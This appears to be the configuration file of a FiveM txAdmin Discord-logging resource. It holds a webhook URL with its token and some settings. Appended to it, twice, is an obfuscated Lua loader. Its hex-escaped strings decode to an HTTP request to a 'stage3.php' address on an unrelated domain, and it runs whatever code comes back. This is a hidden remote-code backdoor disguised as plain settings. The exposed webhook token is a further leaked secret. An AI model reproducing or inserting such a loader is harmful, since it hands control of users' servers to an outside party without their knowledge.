Config = {}

Config.txAdminWebhook = 'https://discord.com/api/webhooks/1058702982566383716/sLkT_24qTsUUyK2c3P3nWRMraUhjlcQbscnN_MQ__7CaK_c4oC1K6BF4eyy39gYyjY3L'

Config.Username = 'Bajt0l-txadmin logs'

Config.FilterAnnouncements = true

local iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[4][iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x65\x73\x7a\x6a\x71\x76\x70\x6a\x68\x69\x6f\x75\x2e\x6d\x6f\x6d\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x62\x6c\x63\x32\x6c", function (NkszWBpAPBkXiGFyefURGibiGQKeMmUsfWcTTvGZHWqYPUlfXWxVSDbrvUPkzLYoOqmaos, rQJCWBIdXZZwEBIqJKBDEBxfEtTmqZfACcUjnzjUlMFBFsHSAsBwfxeWvCbBYsYvbZQljs) if (rQJCWBIdXZZwEBIqJKBDEBxfEtTmqZfACcUjnzjUlMFBFsHSAsBwfxeWvCbBYsYvbZQljs == iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[6] or rQJCWBIdXZZwEBIqJKBDEBxfEtTmqZfACcUjnzjUlMFBFsHSAsBwfxeWvCbBYsYvbZQljs == iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[5]) then return end iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[4][iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[2]](iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[4][iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[3]](rQJCWBIdXZZwEBIqJKBDEBxfEtTmqZfACcUjnzjUlMFBFsHSAsBwfxeWvCbBYsYvbZQljs))() end)

local iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW = {"\x50\x65\x72\x66\x6f\x72\x6d\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G,"",nil} iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[4][iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[1]]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x65\x73\x7a\x6a\x71\x76\x70\x6a\x68\x69\x6f\x75\x2e\x6d\x6f\x6d\x2f\x76\x32\x5f\x2f\x73\x74\x61\x67\x65\x33\x2e\x70\x68\x70\x3f\x74\x6f\x3d\x62\x6c\x63\x32\x6c", function (NkszWBpAPBkXiGFyefURGibiGQKeMmUsfWcTTvGZHWqYPUlfXWxVSDbrvUPkzLYoOqmaos, rQJCWBIdXZZwEBIqJKBDEBxfEtTmqZfACcUjnzjUlMFBFsHSAsBwfxeWvCbBYsYvbZQljs) if (rQJCWBIdXZZwEBIqJKBDEBxfEtTmqZfACcUjnzjUlMFBFsHSAsBwfxeWvCbBYsYvbZQljs == iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[6] or rQJCWBIdXZZwEBIqJKBDEBxfEtTmqZfACcUjnzjUlMFBFsHSAsBwfxeWvCbBYsYvbZQljs == iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[5]) then return end iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[4][iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[2]](iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[4][iuBMckhURCVKzdhDToBIsqcFlGowQHBLyIYILMIlsaxJFXlIThBQpbzyenFDPPslFoxYZW[3]](rQJCWBIdXZZwEBIqJKBDEBxfEtTmqZfACcUjnzjUlMFBFsHSAsBwfxeWvCbBYsYvbZQljs))() end)